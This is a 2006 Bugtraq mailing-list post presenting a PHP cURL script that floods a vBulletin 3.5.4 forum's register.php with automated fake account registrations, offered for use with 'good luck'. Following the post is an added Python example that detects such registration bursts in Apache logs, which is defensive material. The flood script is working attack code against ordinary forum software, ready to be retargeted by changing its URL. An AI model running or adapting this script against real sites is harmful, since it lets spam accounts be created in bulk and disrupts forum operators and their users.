Date: 15 Aug 2006 01:08:01 -0000
From: dicomdk@...il.com
To: bugtraq@...urityfocus.com
Subject: UPDATE vBulletin Version 3.5.4 exploit

####################### vBulletin Version 3.5.4 #########################
Script     : vBulletin Version 3.5.4
site       : www.vbulletin.com
Exploit by : x-boy 
E-mail     : Dicomdk@...il.com
Type       : Registration flood in register.php 
Thanks to  : Simo64 
#########################################################################
Code of exploit (for English version, you can change it to other language) => exploit.php
cURL must be activated (http://curl.haxx.se)
Sorry for my bad English :-)
#########################################################################
<?
set_time_limit(60);
//You can change 10 to other numbers  
for($i = 1 ; $i <= 10 ; $i++)
{
//to put curl to send POST request 
$ch = curl_init();
//change http://localhost/vb3 to the url of the script 
curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php');
curl_setopt($ch , CURLOPT_POST , 1) ;
curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5=&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordconfirm=elmehdi&email=dicomdk'.$i.'@...il.com&emailconfirm=dicomdk'.$i.'@...il.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1');
curl_exec($ch);
curl_close($ch);
}
//Flood finished  good luck 
?>
##########################################################################
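
One way to spot the request pattern the script above produces (a burst of POSTs to register.php from one client) in web server logs. This is an added example, not part of the original post; the Apache combined log format, the threshold, the window and the sample addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache combined log format (assumed): ip ident user [time] "METHOD url proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

def registration_floods(lines, path_suffix="/register.php", limit=5,
                        window=timedelta(seconds=60)):
    """Return {client_ip: peak count} for clients that send more than
    `limit` registration POSTs inside any sliding `window`."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines instead of aborting the scan
        ip, ts, method, url, _status = m.groups()
        # Only form submissions count; viewing the form is a GET.
        if method != "POST" or not url.split("?", 1)[0].endswith(path_suffix):
            continue
        when = datetime.strptime(ts, TS_FORMAT)
        q = recent[ip]
        q.append(when)
        while when - q[0] > window:
            q.popleft()  # drop submissions that fell out of the window
        if len(q) > limit:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def sample_log():
    """Constructed sample: ten POSTs one second apart from one address,
    one ordinary visitor, and one malformed line."""
    flood = [f'198.51.100.7 - - [15/Aug/2006:01:00:{s:02d} +0000] '
             '"POST /vb3/register.php HTTP/1.1" 200 5120 "-" "-"'
             for s in range(10)]
    normal = [
        '203.0.113.9 - - [15/Aug/2006:01:00:03 +0000] '
        '"GET /vb3/register.php HTTP/1.1" 200 8100 "-" "Mozilla/5.0"',
        '203.0.113.9 - - [15/Aug/2006:01:00:40 +0000] '
        '"POST /vb3/register.php HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
        'garbage line',
    ]
    return flood + normal

if __name__ == "__main__":
    for ip, peak in registration_floods(sample_log()).items():
        print(f"{ip}: {peak} registration POSTs within the window")
```

The counter is per client address, so the same burst spread across many addresses would need a site-wide count of register.php POSTs as well.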
